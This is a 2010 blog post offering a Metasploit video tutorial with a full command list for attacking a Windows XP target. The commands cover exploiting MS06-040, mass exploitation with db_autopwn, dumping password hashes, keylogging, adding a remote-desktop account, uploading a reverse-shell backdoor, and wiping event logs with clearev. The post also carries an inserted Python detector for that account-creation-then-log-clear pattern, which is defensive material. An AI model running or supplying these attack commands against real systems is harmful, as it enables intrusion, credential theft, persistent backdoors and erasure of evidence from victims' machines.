Monday, June 7, 2010

[Video] Messing with Metasploit

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3308154
Download video: http://www.mediafire.com/?ztqzyl3j1mz
Commands: http://pastebin.com/9kygLiRe


What is this?
A basic guide to show how powerful the Metasploit Framework is!
> Set up & run an exploit.
> Use nmap to scan.
> Use db_autopwn (to exploit the masses!)
> Gather information about the target.
> Read, download and upload files.
> Run scripts.
> Create & use a backdoor.


What do I need?
> Metasploit Framework
> (Vulnerable) target (e.g. Windows XP SP0/1)


Software
Name: Metasploit
Version: 3.3.3
Home Page: http://www.metasploit.com/
Download Link: http://www.metasploit.com/framework/download/


Commands:
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts

#show ##Show everything! [wasn't in video]

use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable

#set payload windows/shell_bind_tcp ##Could do a Windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts

db_autopwn -t -p -e

sessions -l
sessions -i 1

sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about the target, dumps the registry etc. [wasn't in video]
#run vnc ##Sets up VNC [wasn't in video]
#run uploadexec ##Uploads and runs a program [wasn't in video]
clearev
exit -y
exit -y

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exe
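As an added defender-side example that is not part of g0tmi1k's post: the steps above leave a footprint in the target's Security event log, since `run getgui` creates a local account and `clearev` wipes the logs, and the two can be correlated in Python. The event IDs are the pre-Vista numbering (624, 636, 517); the `timestamp|id|host|detail` record format, host names and all sample lines are constructed.

```python
from datetime import datetime, timedelta

# Pre-Vista (Windows XP / Server 2003) Security log event IDs.
EVENT_USER_CREATED = 624       # "User Account Created": the account getgui adds
EVENT_LOCAL_GROUP_ADD = 636    # "Security Enabled Local Group Member Added"
EVENT_AUDIT_LOG_CLEARED = 517  # "The audit log was cleared": what clearev leaves

# Constructed sample records in an assumed "ISO timestamp|event id|host|detail" form.
SAMPLE_LOG = """\
2010-06-07T20:01:03|528|xp-target|Successful Logon: User Name: Administrator
2010-06-07T20:03:41|624|xp-target|User Account Created: New Account Name: g0tmi1k
2010-06-07T20:03:42|636|xp-target|Local Group Member Added: Remote Desktop Users: g0tmi1k
2010-06-07T20:09:15|517|xp-target|The audit log was cleared
2010-06-07T20:11:00|624|file-srv|User Account Created: New Account Name: backup_svc
"""

def parse_record(line):
    """Split one record into its fields; the timestamp becomes a datetime."""
    ts, event_id, host, detail = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "id": int(event_id),
            "host": host, "detail": detail}

def detect(log_text, window=timedelta(minutes=15)):
    """Return (severity, host, message) alerts. Account changes are 'medium',
    any log clear is 'high', and a log clear that follows an account creation
    on the same host within `window` is 'critical' (the getgui-then-clearev pairing)."""
    records = [parse_record(ln) for ln in log_text.splitlines() if ln.strip()]
    creations = {}  # host -> account-creation records seen so far
    alerts = []
    for r in sorted(records, key=lambda rec: rec["ts"]):
        if r["id"] == EVENT_USER_CREATED:
            creations.setdefault(r["host"], []).append(r)
            alerts.append(("medium", r["host"], r["detail"]))
        elif r["id"] == EVENT_LOCAL_GROUP_ADD:
            alerts.append(("medium", r["host"], r["detail"]))
        elif r["id"] == EVENT_AUDIT_LOG_CLEARED:
            prior = [c for c in creations.get(r["host"], [])
                     if r["ts"] - c["ts"] <= window]
            if prior:
                names = ", ".join(c["detail"].rsplit(": ", 1)[-1] for c in prior)
                gap = r["ts"] - prior[-1]["ts"]
                alerts.append(("critical", r["host"],
                               f"audit log cleared {gap} after account creation ({names})"))
            else:
                alerts.append(("high", r["host"], "audit log cleared"))
    return alerts
```

Calling detect(SAMPLE_LOG) escalates the xp-target log clear to critical because it follows the g0tmi1k account creation by about five minutes, while file-srv's account creation alone stays at medium.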


Notes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do a lot more! See the commands above for a few more basic things which I didn't do in the video.
